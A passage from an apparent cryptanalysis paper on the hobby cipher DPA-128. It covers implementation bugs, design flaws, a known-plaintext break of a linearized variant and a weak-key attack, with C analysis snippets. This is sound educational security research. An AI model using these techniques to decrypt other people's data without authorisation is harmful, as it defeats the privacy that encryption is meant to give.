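below are arbitrary sample values, not real key material):

```c
/* S(x) = (x + k + s) % 256: one byte of the S_E() key mixing */
unsigned char S(unsigned char x, unsigned char k, unsigned char s)
{
    return (unsigned char)((x + k + s) % 256);
}

/* Any GF(2)-affine map A satisfies A(x^y) == A(x) ^ A(y) ^ A(0).
 * Count, over all 256*256 input pairs, how often S satisfies it. */
int count_linear_pairs(unsigned char k, unsigned char s)
{
    int x, y, hits = 0;

    for (x = 0; x < 256; ++x)
        for (y = 0; y < 256; ++y)
            if (S((unsigned char)(x ^ y), k, s) ==
                (S((unsigned char)x, k, s) ^
                 S((unsigned char)y, k, s) ^ S(0, k, s)))
                ++hits;
    return hits;
}
```

For k + s == 0 (mod 256) the map is the identity and the relation always
holds, which already hints at a class of weak key bytes; for most other
values of k the count drops well below 256*256.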

The main idea of veins' paper is the so-called "polyalphabetic substitution"
concept, whose implementation is supposed to be the S_E() C function.
Reading the code, it appears to be no more than a key mixing function,
an addition modulo 256 on each byte.

Remark: We shall see later the importance of the mathematical operation
known as 'addition' over GF(2^8). Regarding the key scheduling, each cipher
round makes use of a 128b subkey as well as of a 32b one deriving from it
called "shift". The following pseudo code describes this operation:

    skey(0) = checksum128(master_key)
    for i = 0, nbr_round-2:
        skey(i+1) = checksum128(skey(i))
    skey(0) = skey(15)
    for i = 0, nbr_round-1:
        shift(nbr_round-1 - i) = hash32(skey(i))

where skey(i) is the i'th subkey.

It is not necessary to describe checksum128() and hash32() explicitly; the
reader just has to keep this in mind: whatever weaknesses there may be in
those functions, we will from now on consider them to be true oneway hash
functions providing perfect entropy.
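As a data-flow illustration only, the pseudo code above can be sketched in
C; checksum128_toy() and hash32_toy() below are toy stand-ins, NOT the real
DPA-128 functions (which we treat as ideal oneway functions anyway):

```c
#include <string.h>

#define NBR_ROUND    16
#define DPA_KEY_SIZE 16

/* toy stand-in for checksum128(): a byte-wise rotate/xor mix */
static void checksum128_toy(const unsigned char *in, unsigned char *out)
{
    int i;

    for (i = 0; i < DPA_KEY_SIZE; ++i)
        out[i] = (unsigned char)(((in[i] << 1) | (in[i] >> 7))
                 ^ in[(i + 1) % DPA_KEY_SIZE] ^ 0x5c);
}

/* toy stand-in for hash32() */
static unsigned long hash32_toy(const unsigned char *k)
{
    unsigned long h = 0;
    int i;

    for (i = 0; i < DPA_KEY_SIZE; ++i)
        h = 13 * h + k[i];
    return h;
}

void key_schedule(const unsigned char *master,
                  unsigned char skey[NBR_ROUND][DPA_KEY_SIZE],
                  unsigned long shift[NBR_ROUND])
{
    int i;

    /* skey(0) = checksum128(master_key) */
    checksum128_toy(master, skey[0]);
    /* skey(i+1) = checksum128(skey(i)) */
    for (i = 0; i < NBR_ROUND - 1; ++i)
        checksum128_toy(skey[i], skey[i + 1]);
    /* skey(0) = skey(15) */
    memcpy(skey[0], skey[NBR_ROUND - 1], DPA_KEY_SIZE);
    /* shift(nbr_round-1 - i) = hash32(skey(i)) */
    for (i = 0; i < NBR_ROUND; ++i)
        shift[NBR_ROUND - 1 - i] = hash32_toy(skey[i]);
}
```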

As a conclusion, the studied cipher is close to being an SPN (Substitution
- Permutation Network), which is a very generic and well known construction
(AES is one, for example).

--[ 4.1 - Bugs in the implementation

Although veins himself honestly recognizes that the cipher may be weak and
"strongly discourages its use" to quote him [DPA128], some people could 
nevertheless decide to use it as a primitive for encryption of personal 
and/or sensitive data as an alternative to 'already-cracked-by-NSA' 
ciphers [NSA2007]. Unfortunately for those theoretical people, we were able
to identify a bug leading to a potentially incorrect functioning of the 
cryptosystem (with a non negligible probability). 

We saw earlier that the bitshift code skeleton was the following:

/* bitshift.c */
void {r,l}bitshift(unsigned char *block, unsigned int shift)
{
    [...] // SysK : local vars declaration
    unsigned char sblock[DPA_BLOCK_SIZE];

    if (shift)
    {
        [...] // SysK : sblock initialization
    }
    memcpy(block, sblock, DPA_BLOCK_SIZE);
}

Clearly, if 'shift' is 0 then 'block' is fed with stack content! Obviously
in such a case the cryptosystem can't possibly work. 

Since shift is an integer, such an event occurs with at least a theoretical
probability of 1/2^32 per round.

Now let's study the shift generation function:

/* hash32.c */
/*
 * This function computes a 32 bits output out of a variable length input.
 * It is not important to have a nice distribution and low collisions as it
 * is used on the output of checksum128() (see checksum128.c). There is a
 * requirement though, the function should not consider \0 as a key
 * terminator.
 */
unsigned long hash32(unsigned char *k, unsigned int length)
{
    unsigned long h;

    for (h = 0; *k && length; ++k, --length)
        h = 13 * h + *k;
    return (h);
}

As stated in the C code commentary, hash32() is the function which produces
the shift. Although the author is careful and admits that the output 
distribution may not be completely uniform (not exactly equal probability
for each byte value to appear) it is obvious that a strong bias is not
desirable (Cf 7.3). 

However what happens if the first byte pointed to by k is 0? Since the loop
ends when *k equals 0, h will be equal to 13 * 0 + 0 = 0. Assuming
that the underlying subkey is truly random, such an event should occur with
a probability of 1/256 (instead of 1/2^32). Since the output of hash32() is
an integer as stated in the comment, this is clearly a bug.
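The bug is easy to reproduce with the hash32() code quoted above: any input
whose first byte is NUL hashes to 0, whatever the remaining bytes are:

```c
/* hash32() copied verbatim from the cipher: the loop condition
 * "*k && length" treats a leading NUL byte as a terminator, so the
 * whole input is skipped and h stays 0 */
unsigned long hash32(unsigned char *k, unsigned int length)
{
    unsigned long h;

    for (h = 0; *k && length; ++k, --length)
        h = 13 * h + *k;
    return (h);
}
```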

We could be tempted to think that this implementation failure leads to a 
weakness but a short look at the code tells us that:

struct s_dpa_sub_key {
    unsigned char key[DPA_KEY_SIZE];
    unsigned char shift;
};

typedef struct s_dpa_sub_key DPA_SUB_KEY;

Therefore since shift is a char object, the presence of "*k &&" in the code
doesn't change the fact that the cryptosystem will fail with a probability 
of 1/256 per round.

Since the bug may appear independently in each round, the probability of 
failure is even greater:

p("fail") = 1 - p("ok")
          = 1 - Mul( p("ok in round i") )
          = 1 - (255/256)^16
          = 0.0607...

where i is element of [0, (nbr_rounds - 1)]
It's not too far from 1/16 :-)
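The figure can be reproduced numerically; the sketch below just evaluates
1 - (255/256)^rounds:

```c
/* p("fail") = 1 - (255/256)^rounds: probability that at least one of
 * the rounds draws shift == 0 and the cipher mangles the data */
double dpa_failure_probability(int rounds)
{
    double p_ok = 1.0;
    int i;

    for (i = 0; i < rounds; ++i)
        p_ok *= 255.0 / 256.0;  /* round i works with p = 255/256 */
    return 1.0 - p_ok;
}
```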

Remark: We shall see later that the special case where shift is equal to 0 
is part of a general class of weak keys potentially allowing an attacker to 
break the cryptosystem.

Hunting weaknesses and bugs in the implementation of cryptographic
primitives is the common job of some reverse engineers, since it sometimes
allows one to break implementations of algorithms which are believed to be
theoretically secure. While those flaws mostly concern asymmetric
primitives of digital signature or key negotiation/generation, it can also
apply in some very specific cases to the block cipher world.

From now, we will consider the annoying bug in bitshift() fixed.

--[ 4.2 - Weaknesses in the design

When designing a block cipher, a cryptographer has to be very careful about
every detail of the algorithm. In the following section, we describe
several design mistakes and explain why, in some cases, they can reduce the
security of the cipher.

a) We saw earlier that the E() function was applied to each round. However
such a construction is not perfect regarding the first round. Since
rbytechain() is a linear mixing operation not involving key material, it
shouldn't be used as the first operation on the input buffer since its
effect on it can be completely canceled. Therefore, if a cryptanalyst wants
to attack the bitshift() component of the first round, he just has to
apply lbytechain() (the rbytechain() inverse function) to the input vector.
It would thus have been a good idea to put a key mixing as the first
operation of the round.
b) The rbitshift() operation only needs the first 7 bits of the shift
character whereas S_E() uses all of them. It is generally
considered a bad idea to use the same key material for several operations.

c) If for some reason, the attacker is able to leak the second (not the 
first) subkey then it implies the compromising of all the key material. Of
course the master key will remain unknown because of the onewayness of 
checksum128() however we do not need to recover it in order to encrypt
and/or decrypt data.

d) In the bitshift() function, a loop is particularly interesting:

for (i = 0; i < mod; ++i)
    mask |= (1 << i);

What is interesting is that the execution time of the loop depends on
"mod", which is derived from the shift. Therefore we conclude that this
loop probably allows a side channel attack against the cipher. Thanks to X
for having pointed this out ;> In the computer security area, it's well
known that a single tiny mistake can lead to the total compromising of an
information system. In cryptography, the same rules apply.

--[ 5 - Breaking the linearized version

Even if we regret that the choice of the addition operation is not
justified, it is not the worst choice in itself. What would have happened
if the key mixing had been done with a xor operation over GF(2^8) instead,
as is the case in DES or AES for example?

To measure the importance of algebraic consideration in the security of a 
block cipher, let's play a little bit with a linearized version of the 
cipher. That is to say that we replace the S_E() function with the
following S_E2():

void S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] = (key[i] ^ block[i] ^ s) % 256;  // [1] + replaced by xor
}

If X, Y and K are vectors over GF(2^8) representing respectively the input,
the output of S_E2() and the round key material then Y = X xor K.

Remark: K = sK xor shift. We use K for simplification purpose.

Now considering the full round we have :

V = M.U         [a] (rbytechain)
W = M'.V        [b] (rbitshift)
Y = W xor K     [c] (S_E2)

Linear algebra allows the composition of applications rbytechain() and 
rbitshift() since the dimensions of M and M' match but W in [b] is a vector
over GF(2) whereas W in [c] is clearly over GF(2^8). However, due to the 
use of XOR in [c], Y, W and K can also be seen as vectors over GF(2). 
Therefore, S_E2() is a GF(2) affine map between two vector spaces of
dimension 128.

We then have:

Y = M'.M.U xor K

The use of differential cryptanalysis will help us to get rid of the key. 
Let's consider couples (U0,Y0 = E(U0)) and (U1,Y1 = E(U1)) then:

DELTA(Y) = Y0 xor Y1
         = (M'.M.U0 xor K) xor (M'.M.U1 xor K)
         = (M'.M.U0 xor M'.M.U1) xor K xor K     (commutativity & 
	                                          associativity of xor)
         = (M'.M).(U0 xor U1)                     (distributivity)
         = (M'.M).DELTA(U)

Such a result shows us that whatever sK and shift are, there is always a
linear map linking an input differential to the corresponding output
differential.

The generalization to the 16 rounds using matrix multiplication is obvious.
Therefore we have proved that there exists a 128x128 matrix Mf over GF(2)
such that DELTA(Y) = Mf.DELTA(U) for the linearized version of the cipher.

Then assuming we know one couple (U0,Y0) and Mf, we can encrypt any input U.
Indeed, Y xor Y0 = Mf.(U xor U0) therefore Y = (Mf.(U xor U0)) xor Y0.
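The same idea can be demonstrated on a tiny 8 bit toy analogue of the
linearized cipher. Everything below (the matrix rows, the key, the helper
names) is an illustrative assumption, not DPA-128 code; it only checks
that one known couple (u0, y0) is enough to encrypt without the key.

```c
#include <assert.h>

/* Toy 8 bit analogue of the linearized cipher: E(u) = M.u xor k over
 * GF(2). The matrix rows below are arbitrary illustrative values. */
static const unsigned char M_rows[8] =
    { 0x8d, 0x47, 0xa3, 0xd1, 0xe8, 0x74, 0x3a, 0x1d };

/* parity of the bits of x, i.e. a dot product over GF(2) */
static unsigned char parity(unsigned char x)
{
    x ^= x >> 4;
    x ^= x >> 2;
    x ^= x >> 1;
    return (unsigned char)(x & 1);
}

/* y = M.u over GF(2): bit i of y is <M_rows[i], u> */
static unsigned char linmap(unsigned char u)
{
    unsigned char y = 0;
    int i;
    for (i = 0; i < 8; i++)
        y |= (unsigned char)(parity(M_rows[i] & u) << i);
    return y;
}

/* the affine map itself: y = M.u xor k */
static unsigned char E_lin(unsigned char u, unsigned char k)
{
    return linmap(u) ^ k;
}

/* One known couple (u0, y0 = E_lin(u0, k)) is enough to encrypt any u
 * without knowing k: y = M.(u xor u0) xor y0 */
static unsigned char E_from_pair(unsigned char u, unsigned char u0,
                                 unsigned char y0)
{
    return linmap(u ^ u0) ^ y0;
}
```

For the full linearized DPA the 128x128 matrix Mf plays exactly the same
role as this 8x8 toy matrix.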

Remark 1: The attack doesn't give us the knowledge of subkeys and shifts 
but such a thing is useless. The goal of an attacker is not the key in 
itself but rather the ability to encrypt/decrypt a set of 
plaintexts/ciphertexts. Furthermore, considering the key scheduling 
operation, if we really needed to recover the master key, it would be quite
a pain in the ass considering the fact that checksum128() is a one way 
function ;-)

Remark 2: Obviously in order to decrypt any output Y we need to calculate 
Mf^-1 which is the inverse matrix of Mf. This is somewhat more interesting
isn't it ? :-)

Because of rbitshift(), we are unable to determine using matrix 
multiplications the coefficients of Mf. An exhaustive search is of course 
impossible because of the huge complexity (2^16384) however, finding them 
is equivalent to solving 128 systems (1 system per row of Mf) of 128 
variables (1 variable per column) in GF(2). To build such a system, we need
128 couples of (cleartext,ciphertext). The described attack was implemented
using the nice NTL library ([SHOUP]) and can be found in annexe A of this
paper.

$ g++ break_linear.cpp bitshift.o bytechain.o key.c hash32.o checksum128.o 
-o break_linear -lntl -lcrypto -I include
$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
[+] Calculation of Mf
[+] Let's make a test !
[+] Well done boy :>

Remark: Sometimes NTL detects a linear relation between chosen inputs 
(DELTA_X) and will then refuse to work. Indeed, in order to solve the 128 
systems, we need a situation where all the equations are independent. If it's
not the case, then obviously det(M) is equal to 0 (with probability 1/2). 
Since inputs are randomly generated, just try again until it works :-)

$ ./break_linear
[+] Generating the plaintexts / ciphertexts
[+] NTL stuff !
det(M) = 0

As a conclusion we saw that the linearity over GF(2) of the xor operation 
allowed us to write an affine relation between two elements of GF(2)^128 in
the S_E2() function and then to easily break the linearized version using a
128 known plaintext attack. The use of non linearity is crucial in the 
design. Fortunately for DPA-128, Veins chose the addition modulo 256 as the
key mixer which is naturally non linear over GF(2).

--[ 6 - On the non linearity of addition modulo n over GF(2)

The bitshift() and bytechain() functions can be described using matrices over 
GF(2), therefore it is interesting to use this field for algebraic 
cryptanalysis.

The difference between the addition and xor laws in GF(2^n) lies in the 
carry bit:

w(i) + k(i) = w(i) xor k(i) xor carry(i)
where w(i), k(i) and carry(i) are elements of GF(2). 

We note w(i) as the i'th bit of w and will keep this notation until the end. 
carry(i), written c(i) for simplification purpose, is defined recursively:

c(i+1) = w(i).k(i) xor w(i).c(i) xor k(i).c(i)
with c(0) = 0
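These two relations are enough to rebuild addition mod 256. The little C
function below (an illustrative sketch, not DPA code) replays them bit by
bit and can be checked against the processor's own addition.

```c
#include <assert.h>

/* Addition mod 256 rebuilt from the GF(2) relations above:
 *   s(i)   = w(i) xor k(i) xor c(i)
 *   c(i+1) = w(i).k(i) xor w(i).c(i) xor k(i).c(i),  c(0) = 0 */
static unsigned char add_gf2(unsigned char w, unsigned char k)
{
    unsigned char s = 0, c = 0;                /* c holds carry(i) */
    int i;
    for (i = 0; i < 8; i++) {
        unsigned char wi = (w >> i) & 1;
        unsigned char ki = (k >> i) & 1;
        s |= (unsigned char)((wi ^ ki ^ c) << i);
        c = (wi & ki) ^ (wi & c) ^ (ki & c);   /* carry(i+1) */
    }
    return s;                                  /* == (w + k) % 256 */
}
```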

Using this notation, it would thus be possible to determine a set of 
relations over GF(2) between input/output bits which the attacker controls
using a known plaintext attack and the subkey bits (which the attacker
tries to guess).

However, recovering the subkey bits won't be that easy. Indeed, to determine
them, we need to get rid of the carries, replacing them by multivariate 
polynomials where the unknowns are monomials of huge order.

Remark 1: Because of the recursivity of the carry, the order of monomials 
grows as the number of input bits per round and the number of rounds 
increase.

Remark 2: Obviously we can not use intermediary input/output bits in our
equations. This is because unlike the subkey bits, they are dependent on
the key.

We are thus able to express the cryptosystem as a multivariate polynomial 
system over GF(2). Solving such a system is NP-hard. There exist methods
for systems of reasonable order like Groebner bases and relinearization 
techniques, but the order of this system seems to be far too huge.

However for a particular set of keys, the so-called weak keys, it is 
possible to determine the subkeys quite easily getting rid of the complexity
introduced by the carry.

--[ 7 - Exploiting weak keys

Let's first define a weak key. According to wikipedia:

"In cryptography, a weak key is a key which when used with a specific 
cipher, makes the cipher behave in some undesirable way. Weak keys usually
represent a very small fraction of the overall keyspace, which usually 
means that if one generates a random key to encrypt a message weak keys are
very unlikely to give rise to a security problem. Nevertheless, it is 
considered desirable for a cipher to have no weak keys."

Actually we identified a particular subset |W of |K allowing us to deal 
quite easily with the carry problem. A key "k" is part of |W if and only if
for each round the shift parameter is a multiple of 8. The reader should 
understand why later.

We will first present the attack on a reduced version of DPA for simplicity
purpose and generalize it later to the full version.

--[ 7.1 - Playing with a toy cipher

Our toy cipher is a 2 round DPA. Moreover, the cipher takes as input 4*8
bits instead of 16*8 = 128 bits which means that DPA_BLOCK_SIZE = 4. We 
also make a little modification to the rbytechain() operation. Let's 
remember the rbytechain() function:

void rbytechain(unsigned char *block)
{
    int i;
    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
}

Since block is both input AND output of the function then we have, for the
original rbytechain():

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor V(0) = U(0) xor U(1) xor U(3)

Where V(x) is the x'th byte element.

Thus with our modification:

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor U(0)

Regarding the mathematical notation (pay your ascii !@#):

    - U,V,W,Y vector notation of section 5 remains.
    - Xj(i) is the i'th bit of vector Xj where j is j'th round.
    - U0 vector is equivalent to P where P is a plaintext.
    - m is the shift of round 0
    - n is the shift of round 1
    - xor will be written '+' since calculation is done in GF(2)
    - All calculations on subscripts are done in the ring ZZ_32 (mod 32)

How did we choose |W? Using algebra in GF(2) implies dealing with the carry.
However, if k is a weak key (part of |W), then we can manage the calculation
so that it's not painful anymore.

Let i be the lowest bit of any input byte. Therefore for each i part of the
set {0,8,16,24} we have:

u0(i)      = p(i)
v0(i)      = p(i) + p(i+8)
w0(i+m)    = v0(i)
y0(i)      = w0(i) + k0(i) + C0(i)
y0(i+m)    = w0(i+m) + k0(i+m) + C0(i+m)
y0(i+m)    = p(i) + p(i+8) + k0(i+m) + C0(i+m)            /* carry(0) = 0 */
y0(i+m)    = p(i) + p(i+8) + k0(i+m)

u1(i)      = y0(i)
v1(i)      = y0(i) + y0(i+8)
w1(i+n)    = v1(i)
y1(i)      = w1(i) + k1(i) + C1(i)
y1(i+n)    = w1(i+n) + k1(i+n) + C1(i+n)
y1(i+n)    = y0(i) + y0(i+8) + k1(i+n) + C1(i+n)
y1(i+n+m)  = y0(i+m) + y0(i+m+8) + k1(i+n+m) + C1(i+n+m)  /* carry(0) = 0 */
y1(i+n+m)  = p(i) + p(i+8) + k0(i+m) + p(i+8) + p(i+16) 
           + k0(i+m+8) + k1(i+n+m)
y1(i+n+m)  = p(i) + k0(i+m) + p(i+16) + k0(i+m+8) + k1(i+n+m)

As stated before, i is part of the set {0,8,16,24} so we can write:

y1(n+m)    = p(0)  + k0(m)    + p(16) + k0(m+8)  + k1(n+m)
y1(8+n+m)  = p(8)  + k0(8+m)  + p(24) + k0(m+16) + k1(8+n+m)
y1(16+n+m) = p(16) + k0(16+m) + p(0)  + k0(m+24) + k1(16+n+m)
y1(24+n+m) = p(24) + k0(24+m) + p(8)  + k0(m)    + k1(24+n+m)

In the case of a known plaintext attack, the attacker has the knowledge of
a set of couples (P,Y1). Therefore considering the previous system, the 
lowest bits of the K0 and K1 vectors are the unknowns. Here we have a system 
which is clearly underdefined since it is composed of 4 equations and
4*2 unknowns. It will give us the relations between each lowest bit of Y 
and the lowest bits of K0 and K1. 

Remark 1: n,m are unknown. A trivial approach is to determine them which 
costs a complexity of (2^4)^2 = 2^8. Although it may seem a good idea, 
let us remind the reader that we are considering a round reduced cipher! 
Indeed, applying the same idea to the full 16 rounds would cost us 
(2^4)^16 = 2^64! Such a complexity is a pain in the ass even nowadays :-)

A much better approach is to guess (n+m) as it costs 2^4 whatever the 
number of rounds. It gives us the opportunity to write relations between 
some input and output bits. We do not need to know exactly m and n. The 
knowledge of the intermediate variables k0(x+m) and k1(y+n+m) is 
sufficient.

Remark 2: An underdefined system brings several solutions. We are 
thus able to choose arbitrarily 4 variables thus fixing them with values of 
our choice. Of course we have to choose so that we are able to solve the 
system with remaining variables. For example taking k0(m), k0(m+8) and 
k1(n+m) together is not fine because of the first equation. However, fixing
all the k0(x+m) may be a good idea as it automatically gives the k1(y+n+m) 
corresponding ones. 

Now let's go further. Let i be part of the set {1,9,17,25}. We can write:

u0(i)     = p(i)
v0(i)     = p(i) + p(i+8)
w0(i+m)   = v0(i)
y0(i)     = w0(i) + k0(i) + w0(i-1)*k0(i-1)
y0(i+m)   = w0(i+m) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
y0(i+m)   = p(i) + p(i+8) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
y0(i+m)   = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8))*k0(i+m-1)

u1(i)     = y0(i)
v1(i)     = y0(i) + y0(i+8)
w1(i+n)   = v1(i)
y1(i)     = w1(i) + k1(i) + C1(i)
y1(i)     = w1(i) + k1(i) + w1(i-1)*k1(i-1)
y1(i+n)   = w1(i+n) + k1(i+n) + w1(i-1+n)*k1(i-1+n)
y1(i+n)   = y0(i) + y0(i+8) + k1(i+n) + (y0(i-1) + y0(i+8-1)) * k1(i-1+n)

y1(i+n+m) = y0(i+m) + y0(i+m+8) + k1(i+m+n) 
          + (y0(i+m-1) + y0(i+m+8-1)) * k1(i+m+n-1)

y1(i+n+m) = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
          + p(i+8) + p(i+16) + k0(i+m+8) 
	  + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
	  + k1(i+n+m)
          + k1(i+m+n-1) * [p(i-1) + p(i+8-1) + k0(i+m-1)]
          + k1(i+m+n-1) * [p(i-1+8) + p(i+16-1) + k0(i+m-1+8)]

y1(i+n+m) = p(i) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
          + p(i+16) + k0(i+m+8) + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
          + k1(i+n+m)
          + k1(i+m+n-1)*[p(i-1) + k0(i+m-1)]
          + k1(i+m+n-1)*[p(i-1+16) + k0(i+m-1+8)]

Thanks to the previous system resolution, we have the knowledge of the 
k0(i+m-1+x) and k1(i+n+m-1+y) variables. Therefore, we can reduce the 
previous equation to: 

A(i) = k0(i+m) + k0(i+m+8) + k1(i+n+m)           (alpha)

where A(i) is a known value for the attacker.

Remark 1: This equation represents the same system as found in case of i 
being the lowest bit! Therefore all previous remarks remain.

Remark 2: If we didn't have the knowledge of the k0(i+m-1+x) and 
k1(i+n+m-1+y) bits then the number of variables would have grown seriously.
Moreover we would have had to deal with some degree 2 monomials :-/.

We can thus conjecture that the equation alpha will remain true for each i 
part of {a,a+8,a+16,a+24} where 0 <= a < 8.

--[ 7.2 - Generalization and expected complexity

Let's deal with the real bytechain() function now.
As stated before and for DPA_BLOCK_SIZE = 4 we have:

V(0) = U(0) xor U(1)
V(1) = U(1) xor U(2)
V(2) = U(2) xor U(3)
V(3) = U(0) xor U(1) xor U(3)

This is clearly troublesome as the last byte V(3) is NOT calculated like 
V(0), V(1) and V(2). Because of the rotations involved, we won't be able to
know whether the bit manipulated is part of V(3) or not.

Therefore, we have to use a general bit-level formula (subscripts mod 32):

v(i) = u(i) + u(i+8) + a(i).u(i+16)
where a(i) = 1 for i = 24 to 31 and 0 otherwise
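This bit-level form, v(i) = u(i) + u(i+8) + a(i).u(i+16) with subscripts
mod 32 and a(i) = 1 only for i = 24..31, can be checked mechanically
against rbytechain() for DPA_BLOCK_SIZE = 4. All the helpers below are
throwaway code written for this check only.

```c
#include <assert.h>

#define BS 4    /* DPA_BLOCK_SIZE of the toy cipher */

/* rbytechain() exactly as in the cipher source, for a 4 byte block */
static void rbytechain4(unsigned char *block)
{
    int i;
    for (i = 0; i < BS; ++i)
        block[i] ^= block[(i + 1) % BS];
}

/* bit i (0..31) of a 4 byte block, little-endian inside each byte */
static int getbit(const unsigned char *b, int i)
{
    return (b[i / 8] >> (i % 8)) & 1;
}

/* v(i) = u(i) + u(i+8) + a(i).u(i+16) over GF(2), subscripts mod 32;
 * v must be zeroed by the caller */
static void bytechain_formula(const unsigned char *u, unsigned char *v)
{
    int i;
    for (i = 0; i < 32; i++) {
        int a = (i >= 24);                       /* a(i) = 1 for i = 24..31 */
        int bit = getbit(u, i) ^ getbit(u, (i + 8) % 32)
                ^ (a & getbit(u, (i + 16) % 32));
        if (bit)
            v[i / 8] |= (unsigned char)(1 << (i % 8));
    }
}
```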

For i part of {0,8,16,24} we have:

u0(i)     = p(i)
v0(i)     = p(i) + p(i+8)  + a0(i).p(i+16)
w0(i+m)   = v0(i)
y0(i)     = w0(i) + k0(i)   + C0(i)
y0(i+m)   = w0(i+m) + k0(i+m) + C0(i+m)
y0(i+m)   = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m) + C0(i+m) /*carry(0) = 0*/
y0(i+m)   = p(i) + p(i+8)  + a0(i).p(i+16) + k0(i+m)

So in the second round:

u1(i)     = y0(i)
v1(i)     = y0(i) + y0(i+8) + a1(i).y0(i+16)
w1(i+n)   = v1(i)
y1(i)     = w1(i) + k1(i) + C1(i)
y1(i+n)   = w1(i+n) + k1(i+n) + C1(i+n)
y1(i+n)   = y0(i) + y0(i+8) + a1(i).y0(i+16) + k1(i+n) + C1(i+n)
y1(i+n+m) = y0(i+m) + y0(i+m+8) + a1(i+m).y0(i+m+16) + k1(i+n+m)

y1(i+n+m) = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m)
          + p(i+8) + p(i+16) + a0(i+8).p(i+24) + k0(i+m+8)
          + a1(i+m).[p(i+16) + p(i+24) + a0(i+16).p(i) + k0(i+m+16)] + k1(i+n+m)

y1(i+n+m) = p(i) + a0(i).p(i+16) + k0(i+m)
          + p(i+16) + a0(i+8).p(i+24) + k0(i+m+8)
          + a1(i+m).[p(i+16) + p(i+24) + a0(i+16).p(i) + k0(i+m+16)] + k1(i+n+m)

a0(i) is not a problem since we know it. This is coherent with the fact 
that the first operation of the cipher is rbytechain() which is invertible
for the attacker. However, the problem lies in the a1(i+m) variables.

Guessing a1(i+m) is out of the question as it would cost us a complexity of 
(2^4)^15 = 2^60 for the 16 rounds! The solution is to consider the a1(i+m)
as another set of 4 variables. Since the rotation is a multiple of 8,
exactly one of the four byte positions corresponds to the special last
byte, so we can also add the following equation to our system:

a1(m) + a1(m+8) + a1(m+16) + a1(m+24) = 1

This equation will remain true for the other bits.

So what is the global complexity? Obviously with DPA_BLOCK_SIZE = 16 each 
system is composed of 16+1 equations in 16+1 variables (we fixed the 
others). Therefore, the complexity of the resolution is about 
17^3 ~ 2^13 (log(17^3)/log(2) ~ 12.3).

We will solve 8 systems since there are 8 bits per byte. Thus the global 
complexity is around (2^13)*8 = 2^16.

Remark: We didn't take into account the calculation of the equations as 
they are assumed to be determined using a formal calculation program such 
as pari-gp or magma.

--[ 7.3 - Cardinality of |W

What is the probability of choosing a weak key? We have seen that our weak
key criterion is that for each round, the rotation parameter needs to be a
multiple of 8. Obviously, it happens with 16 / 128 = 1/8 theoretical 
probability per round. Since we consider the subkeys to be random, the 
generations of the rotation parameters are independent, which means that 
the overall probability is (1/8)^16 = 1/2^48.

Although a probability of 1/2^48 still means a (huge) set of 2^80 weak keys
out of the 2^128 possible ones, in real life, there are very few chances to
choose one of them. In fact, you probably have a much better chance of 
winning the lottery ;) However, two facts 
must be noticed:

    - We presented one set of weak keys but there may be some more!
    - We illustrated another weakness in the conception of DPA-128
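The 16/128 = 1/8 per round figure itself is easy to check exhaustively;
the following throwaway C helper (illustrative only) enumerates the 128
possible shift values:

```c
#include <assert.h>

/* Count how many of the 128 possible shift values are multiples of 8. */
static int count_weak_shifts(void)
{
    int s, n = 0;
    for (s = 0; s < 128; s++)
        if (s % 8 == 0)
            n++;
    return n;   /* 16, hence a 16/128 = 1/8 chance per round */
}
```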

Remark: A probability of 1/8 per round is completely theoretical as it 
supposes a uniform distribution of hash32() output. Considering the extreme
simplicity of the hash32() function, it wouldn't be too surprising if it 
were different in practice. Therefore we made a short test to compute the 
real probability (Annexe B).

$ gcc test.hash32.c checksum128.o hash32.o -o test.hash32 -O3 
$ time ./test.hash32
[+] Probability is 0.125204

real 0m14.654s
user 0m14.649s
sys 0m0.000s

$ gp -q
? (1/0.125204) ^ 16
274226068900783.2739747241633
? log(274226068900783.2739747241633) / log(2)
47.962...

This result tells us clearly that the probability of the shift being a 
multiple of 8 is around 1/2^2.99 ~ 1/8 per round, which matches the 
theoretical one since the difference is too small to be significant. In 
order to improve the measure, we used checksum128() as an input of 
hash32(). Furthermore, we also tried to test hash32() without the "*k &&" 
bug mentioned earlier. Both tests gave similar results which means that the
bug is not important in practice and that checksum128() doesn't seem to be 
particularly skewed. This is a good point for DPA! :-D

--[ 8 - Breaking DPA-based unkeyed hash function

In his paper, Veins also explains how a hash function can be built out of 
DPA. We will analyze the proposed scheme and will show how to completely 
break it.

--[ 8.1 - Introduction to hash functions

Quoting once again the excellent HAC [MenVan]:
"A hash function is a function h which has, as a minimum, the following two

1. compression - h maps an input x of arbitrary finit bitlength, to an
output h(x) of fixed bitlength n.
2. ease of computation - given h and an input x, h(x) is easy to compute.

In cryptography there are essentially two families of hash functions:

1. The MAC (Message Authentication Codes). They are keyed and provide
both authentication (of source) and integrity of messages.
2. The MDC (Modification Detection Codes), sometimes referred to as MIC. 
They are unkeyed and only provide integrity. We will focus on this kind of 
functions.

When designing his hash function, the cryptographer generally wants it to 
satisfy the following three properties:

- preimage resistance. For any y, it should not be possible (that is to say
computationally infeasible) to find an x such that h(x) = y. Such a property
implies that the function has to be non invertible.
- 2nd preimage resistance. For any x, it should not be possible to find an
x' such that h(x) = h(x') when x and x' are different.
- collision resistance. It should not be possible to find an x and an x' 
(with x different from x') such that h(x) = h(x').

Remark 1: Properties 1 and 2 are essential when dealing with binary 
integrity.

Remark 2: The published attacks on MD5 and SHA-0/SHA-1 were dealing with the
third property. While it is true that finding collisions on a hash function
is enough for the crypto community to consider it insecure (and sometimes
leads to a new standard [NIST2007]), for most usages it still remains 
usable in practice since preimage resistance is not affected.

